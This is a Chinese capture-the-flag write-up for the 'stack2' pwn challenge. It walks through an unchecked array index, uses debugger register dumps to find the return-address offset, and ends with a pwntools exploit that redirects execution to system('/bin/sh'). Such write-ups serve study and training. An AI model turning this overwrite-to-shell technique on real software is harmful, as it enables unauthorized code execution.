填坑=-= 记下数组偏移寻找嗷
攻防世界stack2
如下有数组越界
1 2 3 4 5
| puts("which number to change:"); __isoc99_scanf("%d", &v5); puts("new number:"); __isoc99_scanf("%d", &v7); v13[v5] = v7;
|
如上图1部分方框完成数组赋值,cl寄存器计数,明显eax存放首地址
我们要跳转函数就要找数组首地址距离ret的返回
so第一个断点在mov [eax],cl
第二个在main的ret
结果
如下eax就是数组首地址
1 2 3 4 5 6 7 8 9 10
| EAX 0xffffcf88 ◂— 0xe0 EBX 0x0 ECX 0xff EDX 0xffffcf88 ◂— 0xe0 EDI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 ESI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 EBP 0xffffcff8 ◂— 0x0 ESP 0xffffcf50 —▸ 0xf7ffda74 —▸ 0xf7fd3470 —▸ 0xf7ffd918 ◂— 0x0 EIP 0x80486d5 (main+261) ◂— mov byte ptr [eax], cl
|
如下esp是栈指针的存放寄存器此时指向ret
1 2 3 4 5 6 7 8 9 10
| *EAX 0x0 EBX 0x0 *ECX 0xffffd010 ◂— 0x1 *EDX 0xf7fb987c (_IO_stdfile_0_lock) ◂— 0x0 EDI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 ESI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0 *EBP 0x0 *ESP 0xffffd00c —▸ 0xf7e1d647 (__libc_start_main+247) ◂— add esp, 0x10 *EIP 0x80488f2 (main+802) ◂— ret
|
ret的地址减去eax存放的地址
hex(0xffffd00c-0xffffcf88)
=0x84
因为服务器环境错误后面没有so我们就用system+/bin/sh
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
| from pwn import *
r = process("./stack2")
r.recvuntil("How many numbers you have:\n") r.sendline("1") r.recvuntil("Give me your numbers\n") r.sendline("1")
def change(addr, num): r.recvuntil("5. exit\n") r.sendline("3") r.recvuntil("which number to change:\n") r.sendline(str(addr)) r.recvuntil("new number:\n") r.sendline(str(num))
change(0x84, 0x50) change(0x85, 0x84) change(0x86, 0x04) change(0x87, 0x08) change(0x8c, 0x87) change(0x8d, 0x89) change(0x8e, 0x04) change(0x8f, 0x08)
r.sendline("5")
r.interactive()
|